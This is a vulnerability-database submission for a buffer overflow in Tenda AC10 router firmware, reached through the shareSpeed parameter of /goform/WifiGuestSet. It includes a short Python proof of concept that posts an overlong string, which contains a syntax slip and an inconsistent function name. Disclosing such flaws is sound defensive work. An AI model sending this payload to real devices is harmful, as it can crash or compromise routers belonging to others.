| Title | Tenda AC10 V4.0_V16.03.10.13 Buffer Overflow |
|---|
| Description | This vulnerability can be remotely exploited through the network. An attacker can simply send a maliciously crafted POST request to the target server. This request contains a payload designed to overload the memory by leveraging the shareSpeed parameter. This attack is fully automated and does not require any user interaction, making it highly effective and stealthy.
attack chain : WifiGuestSet->fromSetWifiGusetBasic
Attack the shareSpeed variable located in the freeSetWifiGusetBasic function by requesting the WifiGuestSet function, and use the strcpy function for buffer overflow
poc:
import requests
host = "192.168.64.1"
offset = "a"*0x150
def exp():
url = f"http://{host}/goform/WifiGuestSet"
data = {
b'shareSpeed':offset}
res = requests.post{url=url,data=data}
print(res.content)
|
|---|
| User | x1aob1n (ID 68191) |
|---|
| Submission | 2024-04-26 07:29 (1 month ago) |
|---|
| Moderation | 2024-05-04 09:14 (8 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB Entry | 231099 |
|---|